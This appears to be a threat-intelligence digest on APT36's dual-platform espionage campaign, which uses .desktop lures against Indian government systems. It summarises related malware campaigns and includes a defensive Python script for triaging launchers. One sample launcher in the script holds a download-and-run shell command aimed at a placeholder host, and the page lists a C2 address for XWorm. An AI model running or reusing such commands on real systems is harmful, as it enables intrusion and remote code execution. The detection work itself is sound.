
Transparent Tribe Targets Indian Government with Dual-Platform Malware Campaign

3 unique sources, 4 articles

Summary


APT36, also known as Transparent Tribe, is targeting both Windows and BOSS Linux systems in ongoing attacks against Indian government and defense entities. The campaign, active since June 2025, involves phishing emails delivering malicious .desktop files disguised as PDFs. The malware facilitates data exfiltration and persistent espionage access, and includes anti-debugging and anti-sandbox checks. It also targets the Kavach 2FA solution used by Indian government agencies. The attack leverages the .desktop file's 'Exec=' field to execute a sequence of shell commands that download and run a Go-based ELF payload. The payload establishes persistence through cron jobs and systemd services, and communicates with a C2 server over a WebSocket channel. The technique allows APT36 to evade detection by abusing a legitimate Linux feature that is not typically monitored for threats. The campaign demonstrates APT36's evolving tactics, which are becoming more evasive and sophisticated. It uses dedicated staging servers for malware distribution, a transition away from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution. The campaign is part of a broader trend of targeted activity by South and East Asian threat actors toward purpose-built malware and infrastructure.
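The summary above turns on one detail: a launcher file whose 'Exec=' line runs a shell pipeline instead of opening the document its name promises. The following triage script is an added example written for this page; it is not code from the original reporting or from any vendor. It parses the [Desktop Entry] group of a .desktop file and flags the traits the summary describes (an inline shell, a network fetch, chmod on the fetched file, chained commands, and a document-looking Name whose Exec is not a viewer). The heuristics, the viewer list, and both sample launchers are assumptions constructed for the example; the staging host uses a placeholder domain and is not an indicator from the campaign.

```python
"""Heuristic triage of Linux .desktop launcher files (added example, not page code)."""
import os
import re
from typing import Dict, List

# Programs a document-named launcher could legitimately start (assumed list).
DOCUMENT_VIEWERS = {"xdg-open", "evince", "okular", "atril", "libreoffice", "firefox"}


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return key/value pairs from the [Desktop Entry] group of a .desktop file.

    Other groups such as [Desktop Action ...] are ignored; comment and blank
    lines are skipped. Values are kept raw, including any quoting.
    """
    entry: Dict[str, str] = {}
    in_main_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_main_group = line == "[Desktop Entry]"
            continue
        if in_main_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def triage_exec(entry: Dict[str, str]) -> List[str]:
    """Return human-readable findings for a parsed entry (empty list = nothing flagged)."""
    findings: List[str] = []
    exec_line = entry.get("Exec", "")
    name = entry.get("Name", "")

    if re.search(r"\b(sh|bash|dash|zsh)\s+-c\b", exec_line):
        findings.append("Exec invokes an inline shell command (sh -c)")
    if re.search(r"\b(curl|wget)\b", exec_line):
        findings.append("Exec fetches content from the network")
    if re.search(r"\bchmod\s+(\+x|[0-7]{3,4})", exec_line):
        findings.append("Exec marks a file executable after writing it")
    if re.search(r"&&|\|\||;", exec_line) or re.search(r"\s&\s", exec_line):
        findings.append("Exec chains several commands in one launcher")
    if re.search(r"\b(xxd\s+-r|base64\s+(-d|--decode))", exec_line):
        findings.append("Exec decodes an embedded or downloaded blob")

    tokens = exec_line.split()
    first = os.path.basename(tokens[0]) if tokens else ""
    if re.search(r"\.(pdf|docx?|xlsx?|pptx?)$", name, re.IGNORECASE) and first not in DOCUMENT_VIEWERS:
        findings.append(f"Name looks like a document ({name}) but Exec starts with {first!r}")
    return findings


def triage_desktop_file(text: str) -> Dict[str, object]:
    """Parse and score one launcher; two or more findings are treated as suspicious."""
    entry = parse_desktop_entry(text)
    findings = triage_exec(entry)
    verdict = "suspicious" if len(findings) >= 2 else ("review" if findings else "benign")
    return {"name": entry.get("Name", ""), "findings": findings, "verdict": verdict}


# Constructed sample: an ordinary browser launcher.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Icon=firefox
Terminal=false
"""

# Constructed sample mirroring the described lure shape: PDF-looking Name and icon,
# Exec runs a shell that downloads, marks executable, runs a payload, then opens a decoy.
# The host is a placeholder (.invalid TLD), not a real indicator.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=x-office-document
Terminal=false
Exec=sh -c "curl -s http://staging.example.invalid/f -o /tmp/.x && chmod +x /tmp/.x && /tmp/.x & xdg-open /tmp/decoy.pdf"
"""

if __name__ == "__main__":
    for sample in (BENIGN_DESKTOP, SUSPICIOUS_DESKTOP):
        result = triage_desktop_file(sample)
        print(f"{result['name']!r}: {result['verdict']}")
        for finding in result["findings"]:
            print("  -", finding)
```

In practice the same function would be run over launchers in ~/.local/share/applications, ~/Desktop, ~/.config/autostart and mail attachment quarantine, with the "review" verdict routed to an analyst rather than auto-blocked, since single traits such as a chained command occur in legitimate launchers.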

Timeline

  1. 23.10.2025 18:30 · 2 articles · 1d ago

    APT36 Uses DeskRAT for Enhanced Command and Control

    The malware is a Golang-based remote access Trojan (RAT) called DeskRAT. It can upload and execute files remotely, collect sensitive files under 100MB, and maintain persistence through multiple Linux-specific techniques. The campaign uses a new, sophisticated command interface for managing compromised systems, allowing real-time monitoring, file collection, and remote access across infected hosts. The malware includes anti-debugging and anti-sandbox checks, and uses WebSocket for C2 communication. The campaign reflects a trend toward purpose-built malware and infrastructure, with frequent operations and a high delivery cadence.

  2. 25.08.2025 11:13 · 2 articles · 2mo ago

    APT36 Targets Indian Entities with Linux .desktop File Malware

    The campaign now targets both Windows and BOSS Linux systems. The malware uses a shell script to download and execute a hex-encoded file from an attacker-controlled server and opens a decoy PDF to deceive the user. The malware performs system reconnaissance and includes anti-debugging and anti-sandbox checks. It deploys a known Transparent Tribe backdoor called Poseidon and targets the Kavach 2FA solution used by Indian government agencies. The campaign uses typo-squatted domains and infrastructure hosted on Pakistan-based servers. The campaign uses dedicated staging servers for malware distribution, transitioning from cloud storage platforms. The malware includes multiple persistence methods and supports commands for file browsing, collection, and remote execution.

  3. 22.08.2025 21:35 · 4 articles · 2mo ago

    APT36 Targets Indian Entities with Linux .desktop File Malware

    The campaign began in June 2025 and primarily targeted systems running the Bharat Operating System Solutions (BOSS) Linux distribution. The actor uses dedicated staging servers to distribute the malware, which includes functions suggesting the use of large language models (LLMs) in its development. The operation coincided with protests in Ladakh and New Delhi in August and September 2025, which were used as lures. The campaign reflects a trend toward purpose-built malware and infrastructure. It targets Indian government entities with a Golang-based malware known as DeskRAT, which uses multiple persistence methods, including systemd services, cron jobs, and autostart configurations.


Similar Happenings

XWorm malware variants with ransomware module and over 35 plugins observed

XWorm malware, first observed in 2022, has resurfaced with enhanced capabilities. New versions (6.0, 6.4, and 6.5) include a ransomware module and over 35 plugins, enabling data theft, keylogging, DDoS attacks, and more. The malware is being distributed in phishing campaigns and has been adopted by multiple threat actors. The original developer, XCoder, abandoned the project last year, leading to the proliferation of cracked versions. XWorm's modular architecture allows it to steal data, take control of the host, and encrypt files. Recent campaigns have used various delivery methods, including JavaScript, PowerShell, and AI-themed lures. The ransomware module, Ransomware.dll, encrypts files in specific locations and provides ransom instructions. The malware has been observed in campaigns targeting users in multiple countries, with over 18,459 infections reported in one campaign. XWorm 6.0 is being sold on cybercrime forums for $500 for lifetime access and connects to its C2 server at 94.159.113[.]64 on port 4411. The malware's plugins include modules for remote desktop access, data theft, file management, and system command execution.

Confucius Targets Pakistan with WooperStealer and Anondoor Malware

The threat actor Confucius has launched a new phishing campaign targeting Pakistan, deploying WooperStealer and Anondoor malware. The campaign has targeted government agencies, military organizations, defense contractors, and critical industries since at least December 2024. The attacks use spear-phishing and malicious documents to deliver malware that steals sensitive data and exfiltrates device information. Confucius has shifted from document-focused stealers to more advanced Python-based backdoors like Anondoor, which provides long-term persistence and command execution capabilities. The group employs DLL side-loading, obfuscated PowerShell scripts, scheduled tasks, and stealthy exfiltration routines to achieve persistence and evade detection. Anondoor is capable of full host profiling, collecting system details, geolocating public IPs, and inventorying disk volumes before receiving tasking from its command-and-control (C2) servers.

Clop extortion campaign targets Oracle E-Business Suite

The Clop ransomware gang has been exploiting multiple vulnerabilities in Oracle E-Business Suite since at least August 2025, including the zero-day vulnerability CVE-2025-61882. The gang has been sending extortion emails to executives at multiple organizations, claiming to have stolen sensitive data. The campaign involves a high-volume email blast from hundreds of compromised accounts, some previously linked to the FIN11 threat group. The emails contain contact addresses known to be listed on the Clop ransomware gang's data leak site. CrowdStrike attributes the exploitation of CVE-2025-61882 to the Cl0p ransomware gang with moderate confidence, and the first known exploitation occurred on August 9, 2025. The exploit involves an HTTP request to /OA_HTML/SyncServlet, resulting in an authentication bypass. Oracle has released an emergency patch for the zero-day vulnerability and shared indicators of compromise. The exploit was leaked by a group called Scattered Lapsus$ Hunters, raising questions about their potential collaboration with Clop. Envoy Air, a subsidiary of American Airlines, confirms that data was compromised from its Oracle E-Business Suite application after the Clop extortion gang listed American Airlines on its data leak site. Envoy Air stated that no sensitive or customer data was affected, but a limited amount of business information and commercial contact details may have been compromised. The Clop gang is also extorting Harvard University, with the university confirming that the incident impacts a limited number of parties associated with a small administrative unit. Oracle has confirmed that known vulnerabilities in its E-Business Suite, patched in July 2025, may have been exploited in these attacks. The July 2025 Critical Patch Update addressed 309 vulnerabilities across Oracle's product range, including nine for E-Business Suite. Three of these vulnerabilities are critical and three others are exploitable remotely without authentication.
Mandiant and GTIG are investigating the extortion claims and recommend that organizations receiving these emails investigate their environments for unusual access or compromise in their Oracle E-Business Suite platforms. The UK's National Cyber Security Centre (NCSC) has advised Oracle EBS customers to patch the critical vulnerability CVE-2025-61882, which is being exploited by the Clop ransomware group, by applying the emergency security update Oracle published over the weekend. The vulnerability impacts Oracle EBS versions 12.2.3-12.2.14 and allows unauthenticated attackers to send specially crafted HTTP requests to the affected component, resulting in full system compromise. The NCSC has warned that the Scattered Lapsus$ Hunters group has leaked the exploit used by the Clop gang, increasing the risk of opportunistic attacks on Oracle customers. Rapid7 has advised customers of affected Oracle EBS instances to conduct threat hunting to detect any potential malicious activity, given that exploitation in the wild may have occurred since August 2025. CISA has added CVE-2025-61882 to the Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by October 27, 2025. WatchTowr Labs warns of potential mass, indiscriminate exploitation from multiple groups within days.

Phantom Taurus Targets Government and Telecommunications Organizations

Government and telecommunications organizations in Africa, the Middle East, and Asia have been targeted by a China-aligned nation-state actor known as Phantom Taurus over the past two-and-a-half years. The group focuses on espionage, targeting ministries of foreign affairs, embassies, geopolitical events, and military operations. Phantom Taurus employs custom-developed tools and techniques, including a bespoke malware suite named NET-STAR, to maintain long-term intelligence collection and obtain confidential data from targets of strategic interest to China. The group's activities coincide with major global events and regional security affairs, demonstrating stealth, persistence, and adaptability in their tactics, techniques, and procedures (TTPs). Phantom Taurus has been observed using a .NET malware suite named NET-STAR to breach IIS web servers, which operates almost entirely in memory and includes a fileless backdoor that establishes encrypted command-and-control (C2) sessions. The suite includes a backdoor named IIServerCore that accepts commands and encoded .NET payloads, enabling arbitrary code execution on compromised systems. The suite also includes two AssemblyExecuter loaders (v1 and v2) that allow dynamic loading of additional .NET malware, with v2 featuring advanced evasion techniques such as AMSI and ETW bypass. The group uses custom SQL queries to search for specific tables and keywords on compromised systems, exporting all matching results. Additionally, Phantom Taurus's operational methods are supported by other custom malware, including TunnelSpecter and SweetSpecter, which are used for email exfiltration.

XCSSET macOS Malware Targets Xcode Developers with Enhanced Features

A new variant of the XCSSET macOS malware has been detected, targeting Xcode developers with enhanced features. This variant includes improved browser targeting, clipboard hijacking, and persistence mechanisms. The malware spreads by infecting Xcode projects, stealing cryptocurrency, and browser data from infected devices. The malware uses run-only compiled AppleScripts for stealthy execution and employs sophisticated encryption and obfuscation techniques. It incorporates new modules for data exfiltration, persistence, and clipboard monitoring. The malware has been observed in limited attacks, with Microsoft sharing findings with Apple and GitHub to mitigate the threat. Developers are advised to keep macOS and apps up to date and inspect Xcode projects before building them.